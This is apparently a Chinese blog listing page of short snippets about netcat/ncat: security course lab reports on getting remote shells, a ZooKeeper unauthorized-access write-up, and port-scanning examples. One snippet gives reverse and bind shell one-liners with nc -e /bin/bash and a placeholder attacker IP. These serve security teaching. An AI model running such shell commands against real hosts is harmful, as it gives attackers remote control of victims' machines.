- 2024-10-2220222321 2024-2025-1 《网络与系统攻防技术》实验二实验报告
一.实验内容(1)使用netcat获取主机操作Shell,cron启动某项任务(任务自定)(2)使用socat获取主机操作Shell,任务计划启动(3)使用MSFmeterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(4)使用MSFmeterpreter(或其他软件)生成获取目标主机音频、摄
- 2024-10-1820222426 2024-2025-1 《网络与系统攻防技术》实验二实验报告
202224262024-2025-1《网络与系统攻防技术》实验二实验报告1.实验内容(1)例举你能想到的一个后门进入到你系统中的可能方式?后门进入系统中的一种可能方式是通过下载并安装带有后门程序的恶意软件。这些恶意软件可能伪装成合法的软件或工具,诱骗用户下载并安装。一旦安装,后门程
- 2024-10-03Centos Linux使用nc进行网络探测和监听
探测TCP端口[root@sre01~]#nc-zv192.168.236.10022Ncat:Version7.50(https://nmap.org/ncat)Ncat:Connectedto192.168.236.100:22.Ncat:0bytessent,0bytesreceivedin0.02seconds.[root@sre01~]#nc-zv192.168.236.10023Ncat:Version7.50(h
- 2024-07-30zookeeper未授权访问(CVE-2014-085)
漏洞描述默认安装配置完的zookeeper允许未授权访问,管理员未配置访问控制列表(ACL)。导致攻击者可以在默认开放的2181端口下通过执行envi命令获得大量敏感信息(系统名称、java环境)导致任意用户可以在网络不受限的情况下进行未授权访问读取数据漏洞影响ApacheZooKeeper漏洞复现Ap
- 2024-04-03测试UDP端口是否开放
软件下载地址:https://nmap.org/download.htmlwindows安装后,添加下系统路径 命令说明:>ncat-hNcat7.94(https://nmap.org/ncat)Usage:ncat[options][hostname][port]Optionstakingatimeassumeseconds.Append'ms'formilliseconds,'s'forsec
- 2023-08-03网络工具示例
如指定IP包长度大于100:tcpdump-ieth0-n'ip[2:2]>100'traceroute使用oot@zh-hz-hr-ygyradius~]#traceroute-I-p2000192.168.1.1tracerouteto192.168.1.1(192.168.1.1),30hopsmax,60bytepackets1gateway(192.168.3.250)3.987ms4.331
- 2023-05-20nc和ncat的特殊使用
在平常使用nc只会反弹shell,和文件传输,这里学到一些其他的使用方法记录一下反弹shell#反弹shellnc-lvp4444-e/bin/bashnc-nvtarget_iptarget_port#常用的反弹shellnc-lvp4444nc-nvattack_ipattack_port-e/bin/bash注意:在最新的netcat中,不自在-e或者
- 2023-03-07ncat(nc)
ncat(nc)descriptionnc是主要是一个网络安全工具,功能很多,下面列举两个server、client之间传输文件(相应端口要在防火墙上放通)网络安全领域拿shell(正向shell,反向shell)
- 2022-12-27Linux命令篇 - nc(ncat) 命令
nc(ncat)Ncatisafeature-packednetworkingutilitywhichreadsandwritesdataacrossnetworksfromthecommandline;nc(ncat):Ncat是一个功能丰富的网络实用工
- 2022-12-05验证udp
nc-uvz11.0.19.11123 //commandnotfound,则yuminstallncNcat:Version7.50(https://nmap.org/ncat)Ncat:Connectedto11.0.19.11:123.Ncat:UDPpacke
- 2022-08-16centos扫描端口的几种方式
1.telnet#yuminstalltelnet-y检测到端口#telnet192.168.1.18922Trying192.168.1.189...Connectedto192.168.1.189.Escapecharacteris'^]'.SSH-2.0-Op